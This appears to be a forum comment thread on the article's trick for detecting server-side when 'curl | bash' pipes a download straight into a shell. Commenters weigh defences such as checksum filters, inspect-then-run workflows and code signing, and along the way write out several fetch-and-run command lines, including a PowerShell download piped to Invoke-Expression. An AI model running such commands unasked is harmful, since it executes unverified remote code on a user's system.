    $ curl <url> | pipe-checksum <expected> | bash
https://gist.github.com/pcl/64bd2f56695fcf8e1fad51443aab1f1e
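The core of such a filter is small. A sketch of the same idea (the name `pipe_checksum` here is illustrative, not necessarily the linked gist's implementation):

```shell
#!/bin/sh
# Pass stdin through only if its SHA-256 matches the expected digest.
# The input is buffered to a temp file first, so a mismatched script is
# never partially forwarded to the shell later in the pipeline.
pipe_checksum() {
  expected="$1"
  tmp=$(mktemp) || return 1
  cat > "$tmp"
  actual=$(sha256sum < "$tmp" | cut -d' ' -f1)
  if [ "$actual" = "$expected" ]; then
    cat "$tmp"; rm -f "$tmp"
  else
    echo "pipe_checksum: mismatch (got $actual)" >&2
    rm -f "$tmp"
    return 1
  fi
}
```

Used as `curl <url> | pipe_checksum <sha256> | bash`, a bad digest means bash reads an empty stream and executes nothing.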


Since copy-pasting to the terminal is also unsafe[1], it's not really a solution...

At any rate - code-signing doesn't really help if the author is the attacker.

[1] http://thejh.net/misc/website-terminal-copy-paste


Sure, but that's harder to hide. Any user could paste somewhere where nothing gets executed and thereby expose the hack attempt. Pipe to bash has the interesting aspect of letting the author inject hacks only to people who are not looking.

Anyway, the use case for my runck utility is scripts such as Dockerfiles or CI automation, where I want to download and run installers and reduce the bash boilerplate.


I always read the code first, but many times there's an additional curl | bash, and if I check that url there are yet more curl | bash several layers deep, with branches. And they want me to run this as root ...


Regardless of the installation method it sounds like we need to be running all applications in their own individual virtual machines (e.g. Qubes OS) or within a restricted environment with limited permissions (iOS)


How do you install the virtual machine software? Where do you put the trust?


Worse, what happens when I do want the applications to communicate?

An amusing gotcha I found with docker was: how do I convince the servers I communicate with from inside the container that I am me? Best bet was to map my user into the user on the container, but that was actually ridiculously fraught with trouble. (There is a chance this has since been fixed...)


> I do want the applications to communicate?

Qubes OS adopted the "manual authentication" method (of having to confirm everything, such as clipboard copy/paste).

This is probably not quite scalable (not to mention annoying). Maybe there's some way to have a short session token, so that during a work session of a few hours it works without any intervention.


The problem came when I wanted the app to communicate to another on behalf of me. Do I have to constantly reconfigure an openid connection for every app on my machine? (Not the worst of ideas, I suppose...)



This is immune to the attack:

    bash -c "$(curl -sSLf $URL)"
The key is to download first and then run


Or better yet:

    curl $URL > $FILE
    less $FILE
    bash $FILE

This attack only works at all if you download something and execute it immediately without looking at it.


Do you know if

  . <(curl -sL $url)
works (sourcing from a Process Substitution)?


The obsession against shell pipes is so absolutely absurd. You’d download a dmg and drag it to your apps but not shell pipe? You’ll sudo dpkg -i but not a shell pipe?

Can anyone point to a single case of a shell pipe ever being abused?


If a tree falls in a forest and no one is around to hear it, does it make a sound?

I'm certain that someone has been exploited using shell pipes.


I'd like to point out that the author is not directly discrediting shell pipes.

> a knowledgable user will most likely check the content first

The obvious workaround would be to download with curl, inspect, then run the very same inspected file through bash. This workflow is just as easy without using pipes. Package files can also be inspected before running, and are not directly inspected in the browser.

Trust, on the other hand, is more complicated. Without doing tedious manual inspection, you have to rely on the distributor. Public keys aid in this regard, but they do not work with the `curl | bash` workflow.


Bash: execute an unsigned script to install an unsigned payload. Probably requires admin rights.

dmg: download an archive file which contains a signed payload which is copied to Apps. Admin rights are used for copying only.

The difference is blindingly obvious.


I have proposed a solution to this: have the snippet self-hashed and verified against multiple sources, e.g.:

    A=$(curl -L https://get.rvm.io); echo "$A" | shasum -a 256 | grep -q 05b6b5f164d4df5aa593f9f925806fc1f48c4517daeeb5da66ee49e8562069e1 && (echo "$A")


The main reason to use `curl | bash` is because it's installed almost everywhere. Everything else can be bootstrapped from that.

If there were a standard `curlbash <URL> <SHA256>` program installed everywhere, it would allow working around all of these issues.
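Nothing like that exists as a standard tool, but a sketch of it is straightforward (assumes `curl` and `sha256sum` are available):

```shell
#!/bin/sh
# curlbash <url> <sha256>: download to a temp file, verify the digest,
# and execute only on a match. Never pipes unverified bytes into bash.
curlbash() {
  url="$1"; expected="$2"
  tmp=$(mktemp) || return 1
  if ! curl -fsSL "$url" > "$tmp"; then
    rm -f "$tmp"; return 1
  fi
  actual=$(sha256sum < "$tmp" | cut -d' ' -f1)
  if [ "$actual" != "$expected" ]; then
    echo "curlbash: checksum mismatch for $url" >&2
    rm -f "$tmp"; return 1
  fi
  bash "$tmp"; rc=$?
  rm -f "$tmp"
  return $rc
}
```

Because the whole body lands on disk before anything runs, the timing-based server-side detection in the article gets nothing to observe.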


"curl > file ; [...] ; bash file" is also installed in all the same places.


What I learned in addition to the sleep trick:

> Execution in bash is performed line by line and so the speed that bash can ingest data is limited by the speed of execution of the script.

So even without any clever detection logic, thinking of curl | bash as "downloading a script, then immediately executing it" is already wrong.

It's more "give this remote host a poor man's shell to my machine and hope that they will always execute the same sequence of commands on it".


Recent Chrome Canaries show ERR_CERT_SYMANTEC_LEGACY on this host. Gotta refresh those TLS certificates before September!


Let's say for discussion that we allow this curl | bash process because it is from a "safe" source.

How do we come back next week and ensure some other process hasn't changed the files ?

Package your files with a signed system. Auditing the files is trivial after that.


You could prevent the detection by wrapping contents in a block, so Bash reads it entirely before evaluating it: `safe_curl() { printf "{\n"; curl "$@"; printf " \n}"; }`
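That works because bash must read a `{ ... }` compound command up to its closing brace before executing any of it. A quick local check, with a syntax error near the end standing in for a truncated or tampered tail:

```shell
# Without braces, bash executes line by line: the first command runs
# before the parser ever sees the broken line.
out1=$(printf 'echo first\nthis_is(broken\n' | bash 2>/dev/null)
echo "unwrapped: '$out1'"   # prints: unwrapped: 'first'
# Wrapped in { }, bash must parse up to the closing brace before running
# anything, so the parse error aborts with nothing executed.
out2=$(printf '{\necho first\nthis_is(broken\n}\n' | bash 2>/dev/null)
echo "wrapped: '$out2'"     # prints: wrapped: ''
```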


Quite a sensible precaution anyway, as network interruption may otherwise leave you with a partially executed script.


I use curl and bash to launch a script I wrote to install my versioned home files, and this method is worth using. It depends on what you need; in my use case it is really convenient. It is a matter of trust.


Erm, why not just configure auditd to detect it instead? Though not sure how widely available that facility is outside of Red Hat.


Shall we call this "Curl rebinding" after "DNS rebinding"? :)


Why not start with checking the user agent?


The idea is to distinguish between "curl http://x" and "curl http://x | bash", in order to only give malicious content when the user pipes it straight to bash (presumably they aren't looking at the content in this case).


Ah, of course.


Is there no way to sign scripts with a code signing certificate?

I certainly have to do some hoop jumping to execute the equivalent of curl | bash in PowerShell.


    (Invoke-WebRequest https://example.com/install.ps1).Content | Invoke-Expression


How is that any different from using SSL? In both cases, someone you trust is giving you code to execute, unseen.


> a knowledgable user will most likely check the content first

Really? Are they going to read every line of code and every line of code in every dependency that the install script installs?

The bash detection is clever, but I think it's a solution to a problem that doesn't exist. It's already very easy to hide malicious code in plain sight; why go to all this trouble to detect whether the user is piping to bash?

For example, see how easy it is to publish a fake npm package or a .deb package:

https://hackernoon.com/im-harvesting-credit-card-numbers-and...

https://github.com/ChaitanyaHaritash/kimi



